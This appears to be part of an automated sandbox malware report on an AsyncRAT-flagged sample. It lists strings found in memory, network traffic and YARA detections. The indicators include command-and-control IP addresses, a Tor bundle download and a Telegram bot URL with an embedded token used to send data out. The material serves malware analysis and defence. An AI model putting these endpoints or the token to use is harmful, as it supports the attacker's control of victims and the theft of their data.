                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.245.146.30:8080
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.245.147.30:8080
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.245.148.3:8080
                Source: ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/d0Ouaqizfz/iAAD9_user
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/get
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/get/d0Ouaqizfz/iAAD9_user
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080t-cq
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:80
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.114.131.47:8080
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.233.122.65:8000
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.39.242.18:8080
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.110.140.182:8080
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.88.59.12:80
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.96.78.224:8080
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: yt7dW9nyJK.exe, 00000004.00000002.4535482777.0000000005F15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2137223275.0000000002D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: powershell.exe, 00000006.00000002.2114974841.000000000777D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microfZ
                Source: yt7dW9nyJK.exe, 00000004.00000002.4535482777.0000000005F15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line?fields=query
                Source: tor-real.exe, 00000019.00000002.4520803669.000000006C492000.00000008.00000001.01000000.0000000F.sdmpString found in binary or memory: http://mingw-w64.sourceforge.net/X
                Source: powershell.exe, 00000006.00000002.2111386860.0000000005DBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000006.00000002.2106330524.0000000004EA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2106330524.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004841000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2257333436.000000000280B000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000006.00000002.2106330524.0000000004EA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000006.00000002.2114974841.000000000777D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://101.126.19.171:443
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://138.2.92.67:443
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://185.217.98.121:443
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://192.99.196.191:443
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%s
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%sDANGEROU
                Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://44.228.161.50:443
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000006.00000002.2106330524.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBcq
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=68783
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayCan
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://blog.torproject.org/v2-deprecation-timeline
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://blog.torproject.org/v2-deprecation-timelineCalled
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://bugs.torproject.org/tpo/core/tor/14917.
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://bugs.torproject.org/tpo/core/tor/21155.
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://bugs.torproject.org/tpo/core/tor/8742.
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://freehaven.net/anonbib/#hs-attack06
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                Source: powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip
                Source: powershell.exe, 00000006.00000002.2111386860.0000000005DBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com
                Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/146779096/943f13f9-3eb9
                Source: tor-real.exe, 00000019.00000003.2480126236.0000000000F99000.00000004.00000020.00020000.00000000.sdmp, tor-real.exe, 00000019.00000003.2480334593.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, tor-real.exe, 00000019.00000003.2465033062.0000000003B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sabotage.net
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004169000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4541756048.0000000004161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004169000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4541756048.0000000004161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.torproject.org/
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.torproject.org/docs/faq.html#BestOSForRelay
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.torproject.org/documentation.html
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.torproject.org/download/download#warning
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.torproject.org/download/download#warningalphabetaThis
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 199.188.200.89:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWindow created: window name: CLIPBRDWNDCLASS

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeCode function: 0_2_00B5E2CC0_2_00B5E2CC
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeCode function: 4_2_02A940104_2_02A94010
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeCode function: 4_2_02A981004_2_02A98100
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeCode function: 4_2_02A9CB0E4_2_02A9CB0E
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeCode function: 4_2_02A939F84_2_02A939F8
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeCode function: 4_2_02A989D04_2_02A989D0
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeCode function: 4_2_02A90FC84_2_02A90FC8
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeCode function: 4_2_02A97DB84_2_02A97DB8
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeCode function: 4_2_06573F084_2_06573F08
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeCode function: 4_2_065718B04_2_065718B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_033AB4906_2_033AB490
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02EFB4908_2_02EFB490
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02EFB4708_2_02EFB470
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_087B3E988_2_087B3E98
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeCode function: 11_2_0274E2CC11_2_0274E2CC
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeCode function: 11_2_04CA730D11_2_04CA730D
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeCode function: 11_2_04CA71DD11_2_04CA71DD
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeCode function: 11_2_04CA71BD11_2_04CA71BD
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeCode function: 11_2_04CA02C811_2_04CA02C8
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeCode function: 11_2_04CA02D811_2_04CA02D8
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeCode function: 11_2_04CA72E511_2_04CA72E5
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeCode function: 11_2_04CA739D11_2_04CA739D
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeCode function: 11_2_04CA73AD11_2_04CA73AD
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeCode function: 11_2_04CAEB9011_2_04CAEB90
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_052CE2CC19_2_052CE2CC
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_052C74A719_2_052C74A7
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_06290D2019_2_06290D20
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_06290D0F19_2_06290D0F
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967294119_2_09672941
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967514819_2_09675148
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967315719_2_09673157
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967411819_2_09674118
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_096759B019_2_096759B0
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967004019_2_09670040
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967B0E819_2_0967B0E8
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_09679BE019_2_09679BE0
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967753019_2_09677530
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_096784C019_2_096784C0
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967979819_2_09679798
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_09679E8019_2_09679E80
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967896819_2_09678968
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967513B19_2_0967513B
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_096759A019_2_096759A0
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967904C19_2_0967904C
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967905819_2_09679058
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967001219_2_09670012
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_09679BD019_2_09679BD0
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967AAE919_2_0967AAE9
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967454019_2_09674540
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967752019_2_09677520
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_096784B019_2_096784B0
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_096737A819_2_096737A8
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_0967379919_2_09673799
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 19_2_09679E7019_2_09679E70
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 22_2_0290E2CC22_2_0290E2CC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C07408025_2_6C074080
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C061D2025_2_6C061D20
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C061D3325_2_6C061D33
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C06214225_2_6C062142
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C06B99825_2_6C06B998
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0751E025_2_6C0751E0
